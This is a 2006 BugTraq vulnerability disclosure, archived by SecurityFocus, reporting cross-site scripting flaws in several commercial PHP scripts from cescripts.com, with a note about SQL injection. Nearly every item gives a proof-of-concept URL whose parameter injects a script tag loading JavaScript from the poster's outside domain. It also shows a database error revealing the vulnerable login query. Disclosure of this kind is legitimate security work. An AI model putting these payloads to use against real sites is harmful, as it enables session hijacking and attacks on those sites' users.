BugTraq
cescripts.com - XSS Jun 11 2006 09:03PM
luny youfucktard com
Cescripts.com Scripts

Below are scripts I tested from the site cescripts.com. This site seels to be selling canned scripts, full of errors. Anyways, take a look:

Car Classifieds

Homepage:

http://www.cescripts.com/

effected files:

index.php

XSS Vulnerabilities PoC:

Viewing a car:

http://www.example.com/car_classifieds/listings/index.php?pag=car_view&c
ar_id=32&offset=0&ord=1&make_id=63'>">'><SCRIPT%20SRC=http://www.youfuck
tard.com/xss.js></SCRIPT>

The Car listings:

http://www.example.com/car_classifieds/listings/index.php?pag=car_list&o
rd=1&make_id=63'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></S
CRIPT>

Screenshots:

http://www.youfucktard.com/xsp/car1.jpg

http://www.youfucktard.com/xsp/car2.jpg

http://www.youfucktard.com/xsp/car3.jpg

http://www.youfucktard.com/xsp/car4.jpg

--------------------------------------------------

Event Registration ALL VERSIONS

Effected files:

view-event-details.php

event-registration.php

view-event-details.php XSS Vuln:

http://www.example.com/rsvp3/view-event-details.php?event_id=74'>">'><SC
RIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>

Event-registration-details.php XSS Vuln:

http://www.example.com/rsvp3/event-registration.php?select_events=74'>">
'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>&submit=Regis
ter

Screenshots:

http://www.youfucktard.com/xsp/event1.jpg

http://www.youfucktard.com/xsp/event2.jpg

------------------------------------------------

Fast Menu Restaurant Ordering v1.0

Effected files:

index.php

XSS Vuln PoC on sel_menu variable:

http://www.example.com/fastmenu/index.php?pag=gift_certificate&sel_menu=
5'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>

Screenshots:

http://www.youfucktard.com/xsp/frest1.jpg

http://www.youfucktard.com/xsp/frest2.jpg

DB Query error msg upon using sql injection of ' to log in:

Error:db::query() failed.ERROR MESSAGE IS: Failed to run Query:SELECT member_id, first_name, last_name FROM member WHERE password='\\'\\'' AND username='\\'\\'' You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' AND username='\\'\\''' at line 3

-------------------------------------------------

Home Rental Script ALL VERSIONS

Effected files:

index.php

XSS Vuln via sel_menu variable:

This has got to be the worst i've seen yet of this kind. The text is everywhere! I think I counted about 20 popups, no joke.

http://www.example.com/home_rental/index.php?pag=list_properties&act=bas
ket-add&id=17&type=room&ofs=0&day=11&month=6&year=2006&night=1&hotel_id=
&show=&sel_menu='>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></
SCRIPT>

Screenshots:

http://www.youfucktard.com/xsp/cereal1.jpg

http://www.youfucktard.com/xsp/cereal2.jpg

http://www.youfucktard.com/xsp/cereal3.jpg

---------------------------------------------------

There were a ton of other scripts on the site, but I got tired of testing canned scripts =(

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus